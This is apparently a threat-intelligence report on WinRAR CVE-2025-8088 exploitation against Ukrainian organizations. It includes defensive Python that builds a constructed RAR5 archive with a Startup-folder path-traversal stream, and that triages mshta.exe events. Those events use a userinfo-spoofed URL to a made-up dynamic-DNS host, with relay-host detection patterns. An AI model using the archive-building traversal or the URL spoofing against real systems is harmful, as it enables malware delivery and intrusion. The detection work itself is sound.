CVE-2025-8088: A Prominent Vulnerability Targeting Ukrainian Organizations
CVE-2025-8088, a high-severity (CVSS 8.8) path traversal vulnerability in WinRAR, was patched in July 2025 with WinRAR 7.13. It nevertheless remains a significant initial access vector for intrusion sets focused on Ukraine. As of April 2026, at least two distinct campaigns are actively exploiting it. The first is a compiled-stealer chain, provisionally tracked as SHADOW-EARTH-066 and tracked by CERT-UA as UAC-0226. The second is run by Earth Dahu, a Russia-aligned intrusion set that uses an HTA-based chain for espionage.
Both intrusion sets continue to produce fresh exploit samples, and Earth Dahu remains highly active at the time of writing. The flaw lies in how WinRAR handles NTFS Alternate Data Streams (ADS) stored in RAR5 service headers. Versions prior to 7.13 do not sanitize the stream name, so an archive can attach to an innocuous-looking decoy (typically a PDF) a stream whose name contains "..\" components, and extraction writes the stream's contents outside the chosen directory, to locations such as the user's Startup folder or C:\ProgramData. A payload placed in the Startup folder runs at the victim's next login with no further user interaction.
CVE-2025-8088 is attractive because exploitation is quiet and WinRAR is ubiquitous in Ukrainian organizations, which suits both espionage and credential theft. The SHADOW-EARTH-066 campaign has evolved rapidly: its early tactics relied on macro-enabled Excel droppers and plaintext Telegram for exfiltration. By 2026 the group had switched to CVE-2025-8088 for delivery and added an LNK-to-PowerShell loader and an in-memory DLL (result.dll) that performs fast credential and document theft and then erases itself from the system.
The RAR archives in this chain carry three ADS components: an LNK placed in the Startup folder, a heavily obfuscated PowerShell loader written to C:\ProgramData, and an encoded DLL. The loader decodes the DLL and maps it in memory through direct NT system calls (NtAllocateVirtualMemory, NtProtectVirtualMemory and the like), which sidesteps user-mode API hooks and leaves no decoded DLL on disk for file-based scanners to find.
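To make the mechanism concrete, here is an added example (written for this page, not code from the original report or from WinRAR): it builds a constructed RAR5 archive in memory containing a decoy PDF, a benign Zone.Identifier stream and an ADS whose stream name carries "..\" components pointing at the Startup folder, then walks the RAR5 headers and flags STM service headers whose stream name escapes the extraction directory. The header layout follows the published RAR5 format; that the stream name sits in the 0x07 service-data extra record as UTF-8 is this example's assumption, and the file names, stream name and payload bytes are constructed, not taken from a real lure. A mail gateway or sandbox could run the same check over incoming RAR attachments.

```python
"""Added example: flag RAR5 STM (ADS) headers whose stream name escapes the extraction directory (CVE-2025-8088 shape)."""
import re
import struct
import zlib

RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_END = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA = 0x01, 0x02   # header flags: extra area / data area present
FHEXTRA_SUBDATA = 0x07             # extra record carrying the STM stream name (assumed UTF-8)

def vint(n: int) -> bytes:
    """Encode a RAR5 variable-length integer (7 bits per byte, high bit = more bytes follow)."""
    out = bytearray()
    while n >> 7:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)

def read_vint(buf: bytes, pos: int):
    """Decode a RAR5 vint at buf[pos]; returns (value, position after it)."""
    value, shift = 0, 0
    while buf[pos] & 0x80:
        value |= (buf[pos] & 0x7F) << shift
        shift, pos = shift + 7, pos + 1
    return value | (buf[pos] << shift), pos + 1

def build_block(htype: int, body: bytes, extra: bytes = b"", data: bytes = b"") -> bytes:
    """One RAR5 block: CRC32 | size | type | flags | [extra size] [data size] | body | extra | data."""
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if data else 0)
    hdr = vint(htype) + vint(flags) + (vint(len(extra)) if extra else b"") + (vint(len(data)) if data else b"") + body + extra
    sized = vint(len(hdr)) + hdr                       # CRC covers the size field onward
    return struct.pack("<I", zlib.crc32(sized)) + sized + data

def entry_body(name: bytes, unpacked: int) -> bytes:  # file flags=0, unpacked size, attrs, comp info, host OS, name
    return vint(0) + vint(unpacked) + vint(0x20) + vint(0) + vint(0) + vint(len(name)) + name

def build_sample_archive() -> bytes:
    """Constructed lure shape: decoy PDF, a benign Zone.Identifier ADS, a traversal ADS aimed at Startup."""
    decoy, zone, lnk = b"%PDF-1.4 decoy", b"[ZoneTransfer]\r\nZoneId=3\r\n", b"L\x00constructed"
    evil = (":..\\..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\"
            "Start Menu\\Programs\\Startup\\Updater.lnk").encode()
    def stm(stream_name: bytes, payload: bytes) -> bytes:   # STM service header plus its data area
        extra = vint(1 + len(stream_name)) + vint(FHEXTRA_SUBDATA) + stream_name
        return build_block(HEAD_SERVICE, entry_body(b"STM", len(payload)), extra, payload)
    return (RAR5_SIGNATURE + build_block(HEAD_MAIN, vint(0))          # archive flags = 0
            + build_block(HEAD_FILE, entry_body(b"report.pdf", len(decoy)), data=decoy)
            + stm(b":Zone.Identifier", zone) + stm(evil, lnk)
            + build_block(HEAD_END, vint(0)))                          # end-of-archive flags = 0

def parse_headers(blob: bytes):
    """Yield one dict per RAR5 header: type, CRC status, entry name and (for STM) stream name."""
    assert blob.startswith(RAR5_SIGNATURE), "not a RAR5 archive"
    pos = len(RAR5_SIGNATURE)
    while pos < len(blob):
        stored_crc = struct.unpack_from("<I", blob, pos)[0]
        size, p = read_vint(blob, pos + 4)
        end = p + size
        rec = {"crc_ok": zlib.crc32(blob[pos + 4:end]) == stored_crc, "name": None, "stream": None}
        rec["type"], p = read_vint(blob, p)
        flags, p = read_vint(blob, p)
        extra_size, p = read_vint(blob, p) if flags & HFL_EXTRA else (0, p)
        data_size, p = read_vint(blob, p) if flags & HFL_DATA else (0, p)
        if rec["type"] in (HEAD_FILE, HEAD_SERVICE):
            file_flags, p = read_vint(blob, p)
            for _ in range(2):                            # unpacked size, attributes
                _, p = read_vint(blob, p)
            p += (4 if file_flags & 0x02 else 0) + (4 if file_flags & 0x04 else 0)  # mtime, data CRC
            for _ in range(2):                            # compression info, host OS
                _, p = read_vint(blob, p)
            nlen, p = read_vint(blob, p)
            rec["name"] = blob[p:p + nlen].decode("utf-8", "replace")
            ep = end - extra_size                         # extra area is the tail of the header
            while ep < end:
                rsize, ep = read_vint(blob, ep)
                rtype, q = read_vint(blob, ep)
                if rec["type"] == HEAD_SERVICE and rec["name"] == "STM" and rtype == FHEXTRA_SUBDATA:
                    rec["stream"] = blob[q:ep + rsize].decode("utf-8", "replace")
                ep += rsize
        yield rec
        pos = end + data_size
        if rec["type"] == HEAD_END:
            break

def is_traversal_stream(stream: str) -> bool:
    """Legitimate ADS names are ':name'; '..' components, a drive letter or a leading slash escape the directory."""
    s = stream.lstrip(":")
    return bool(re.search(r"(^|[\\/])\.\.([\\/]|$)", s) or s.startswith(("\\", "/")) or re.match(r"[A-Za-z]:", s))

def scan(blob: bytes) -> list:
    """Findings as (kind, detail) tuples: header CRC mismatches and traversal stream names."""
    findings = []
    for rec in parse_headers(blob):
        if not rec["crc_ok"]:
            findings.append(("bad-crc", rec["type"]))
        if rec["stream"] and is_traversal_stream(rec["stream"]):
            findings.append(("ads-traversal", rec["stream"]))
    return findings
```

scan() returns ("ads-traversal", name) for each offending stream and ("bad-crc", type) for headers whose CRC32 does not match, which usually indicates a malformed or tampered archive. It reads only plaintext headers: an archive created with header encryption (a RAR5 encryption header, type 4, followed by encrypted blocks) hides these fields and should be treated as unscannable and quarantined rather than passed through.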
Result.dll is a reworked variant of the earlier GIFTEDCROOK stealer. Built for x86-64 and linked against libcurl, it targets Chromium-based browsers (with a bypass for newer Chrome versions) and Firefox, and scans local documents matching thirty-five file extensions. Its anti-analysis measures include PEB-walking for API resolution, dual-layer RC4-encrypted string tables, identity-function padding and PRNG-based delays.
Exfiltration applies dual-layer RC4 encryption and sends the result by HTTPS POST to dedicated command-and-control (C&C) servers; afterwards the malware deletes its staging artifacts, leaving a minimal forensic footprint. In one observed lure email, the From header was spoofed to look like a Ukrainian law enforcement agency; the message failed DMARC validation because it carried no DKIM signature and nothing else authenticated the spoofed domain.
Earth Dahu, by contrast, follows a script-centric model. Its RAR archives typically drop a single HTA or an obfuscated VBScript downloader that mshta.exe executes at the next user login. These HTA chains load VBScript from attacker-controlled resources, usually proxied through Dynamic DNS services or Cloudflare Workers, and fetch espionage modules, including loaders for GammaSteel and other malware documented by third-party response teams.
Earth Dahu consistently impersonates trusted Ukrainian domains, often by placing the trusted hostname in the userinfo (HTTP basic-auth) portion of a C&C URL: a URL of the form http://<trusted domain>@<attacker host>/ displays the trusted name while the connection actually goes to the attacker's host. Its lures are counterfeit official communications such as court summons or government correspondence. In some chains the URL path structure was also varied to evade signature-based detection.
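As an added example for the two preceding paragraphs (not code from the original report, and using no real telemetry), the Python below triages constructed Sysmon-style process-creation events for the behaviours described: mshta.exe launched on an HTA in the Startup folder, mshta.exe handed a remote URL, a hostname placed in the userinfo part of that URL so the displayed name differs from the host actually contacted, and hosts under dynamic DNS or Cloudflare Workers suffixes. The event records, the name example-court.gov.ua and the relay hostnames are made up; the suffix list (workers.dev, ddns.net, duckdns.org, no-ip.org) is illustrative and would be extended from your own intelligence.

```python
"""Added example: triage constructed process events for the mshta.exe chain and userinfo host spoofing."""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
STARTUP_MARK = r"\start menu\programs\startup"
# Illustrative relay suffixes (dynamic DNS providers and Cloudflare Workers); extend from your own intel.
PROXY_SUFFIXES = ("workers.dev", "ddns.net", "duckdns.org", "no-ip.org")

# Constructed Sysmon-style events; hosts, users and paths are made up for the example.
EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notice.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "http://example-court.gov.ua@update-host.ddns.net/notice.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'mshta.exe "https://relay.example.workers.dev/a?id=7"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},   # benign local HTA, should not fire
]

def host_confusion(url: str):
    """(displayed_name, real_host) when the userinfo part looks like a hostname: a URL such as
    http://trusted.example@evil.example/ shows the trusted name but connects to evil.example."""
    parts = urlsplit(url)
    if parts.username and "." in parts.username:
        return parts.username, parts.hostname
    return None

def relay_host(host: str) -> bool:
    """True when the host sits under one of the illustrative dynamic-DNS / Workers suffixes."""
    return any(host == s or host.endswith("." + s) for s in PROXY_SUFFIXES)

def triage(event: dict) -> list:
    """Return the reasons an mshta.exe event is suspicious (empty list = nothing matched)."""
    reasons = []
    if not event["image"].lower().endswith(r"\mshta.exe"):
        return reasons
    cmd = event["cmdline"]
    if STARTUP_MARK in cmd.lower():
        reasons.append("HTA launched from the Startup folder")
    for url in URL_RE.findall(cmd):
        reasons.append(f"mshta given a remote URL: {url}")
        confusion = host_confusion(url)
        if confusion:
            reasons.append(f"userinfo impersonation: shows {confusion[0]}, connects to {confusion[1]}")
        host = urlsplit(url).hostname or ""
        if relay_host(host):
            reasons.append(f"relay host: {host}")
    return reasons

def triage_all(events=EVENTS) -> dict:
    """Map each flagged event's command line to its triage reasons."""
    return {e["cmdline"]: r for e in events if (r := triage(e))}
```

The userinfo check is the one most often missed by eyeballing: urlsplit() exposes the real target as hostname, while everything before the "@" is username. In production the same logic belongs in a proxy or EDR query rather than a script, and the Startup-folder match should also be applied to the LNK or HTA creation event that precedes the login-time execution.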
Although the patch has been available since July 2025, the vulnerability remains actively exploited, largely because WinRAR lacks enterprise update mechanisms: no Group Policy support, no WSUS/SCCM/Intune integration and, in many deployments, no auto-update. Outdated installs therefore sit in a blind spot. The situation illustrates the risk posed by widely used applications that are not kept patched and so accumulate exploitable vulnerabilities.
Other Russia-aligned groups, including Sandworm, Turla and Void Rabisu, have also been observed exploiting this vulnerability, which underscores its operational value in cyber espionage campaigns.
To mitigate CVE-2025-8088, organizations should prioritize a few essential actions: verify the WinRAR versions in use and update to 7.13 or later, where the ADS path traversal is fixed; block common exploitation patterns at mail gateways (RAR attachments whose ADS entries carry traversal sequences); implement application allowlisting; and deploy endpoint detection that can spot in-memory loading via direct NT syscall sequences. They should also inventory third-party utilities and establish centralized patching or compensating controls for those that, like WinRAR, lack enterprise update mechanisms.
